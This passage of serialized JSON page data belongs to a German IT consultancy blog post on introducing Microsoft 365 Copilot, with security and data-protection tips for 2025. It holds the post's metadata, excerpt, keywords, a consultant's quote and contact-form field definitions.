dren":21217},[21218],{"id":20967,"depth":1814,"text":20815},{"id":20983,"depth":864,"text":20767,"children":21220},[21221,21222,21223,21224],{"id":20991,"depth":1814,"text":20992},{"id":21003,"depth":1814,"text":21004},{"id":21023,"depth":1814,"text":21024},{"id":21032,"depth":1814,"text":20815},{"id":21078,"depth":864,"text":20773,"children":21226},[21227],{"id":21095,"depth":1814,"text":20815},{"id":21114,"depth":864,"text":20779,"children":21229},[21230],{"id":21172,"depth":1814,"text":20815},{"seoTitle":21232,"titleClass":873,"date":21233,"categories":21234,"blogtitlepic":21235,"socialimg":21236,"customExcerpt":21237,"keywords":21238,"contactInContent":21239,"scripts":21266},"Microsoft 365 Copilot einführen: Sicherheits- und Datenschutz-Tipps für 2025","2025-01-10",[26],"header-m365-copilot","/blog/heads/header-m365-copilot.png","Auch 2025 bleibt künstliche Intelligenz, insbesondere Microsoft 365 Copilot, ein zentrales Thema. Viele Unternehmen stehen vor der Pilotierung oder Einführung dieser Technologie. Falls auch ihr dazu gehört, haben wir die wichtigsten Grundlagen vorbereitet, die ihr vorab prüfen oder umsetzen solltet. Besonders wichtig: eine gründliche Auseinandersetzung mit Sicherheits- und Datenschutzaspekten, um eine sichere Implementierung zu gewährleisten. In diesem Artikel erfahrt ihr, worauf es dabei ankommt, um Microsoft Copilot optimal zu nutzen.","Microsoft 365 Copilot, Einführung Microsoft Copilot, Sicherheitsrichtlinien Microsoft 365, Datenschutz Copilot, KI Implementierung, Copilot Pilotierung, Microsoft Copilot Grundlagen, sichere Implementierung, Microsoft KI Einführung, Microsoft 365 Tipps 2025",{"quote":508,"infos":21240},{"bgColor":883,"headline":21241,"subline":21242,"level":810,"textStyling":887,"flush":888,"person":21243,"form":21250},"Jetzt beraten lassen","Ihr möchtet wissen, wie ihr Copilot optimal in eurem Unternehmen einführt? 
Wir unterstützen euch gerne bei der Integration und beantworten eure Fragen zu den technischen Voraussetzungen, Sicherheitsmaßnahmen und Nutzungsszenarien.",{"image":21244,"cloudinary":508,"alt":994,"name":994,"quotee":994,"quoteeTitle":21245,"quote":21246,"detailsHeader":895,"details":21247},"/people/Karsten.Kleinschmidt-250.jpg","Managed Workplace Lead","Damit Microsoft 365 Copilot sein volles Potenzial entfalten kann, ist eine sorgfältige Vorbereitung im Hinblick auf Sicherheit und Compliance unerlässlich.",[21248,21249],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":905,"cta":21251,"method":870,"action":908,"fields":21252},{"skin":907},[21253,21254,21256,21258,21260,21262,21264,21265],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":21255},"Bitte Namen eingeben",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":21257},"Bitte Unternehmensnamen ausfüllen",{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":21259},"Bitte E-Mail-Adresse eingeben",{"label":21261,"type":933,"id":934,"required":508,"requiredMsg":935},"Deine Daten werden zur Bearbeitung und Beantwortung Deiner Anfrage bei uns gespeichert. Weitere Informationen zum Datenschutz findest du in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":942,"value":21263},"Anfrage Blog Microsoft 365 Copilot",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508,"form":508},"/posts/2025-01-09-microsoft-365-copilot",{"title":20738,"description":863},"posts/2025-01-09-microsoft-365-copilot",[26,149,21271,21272],"KI Implementierung","Copilot Pilotierung","e4szDB6QUiRunpcRclgo44YWm-Zuu6PcZGhgYq7umJA",1782490259995]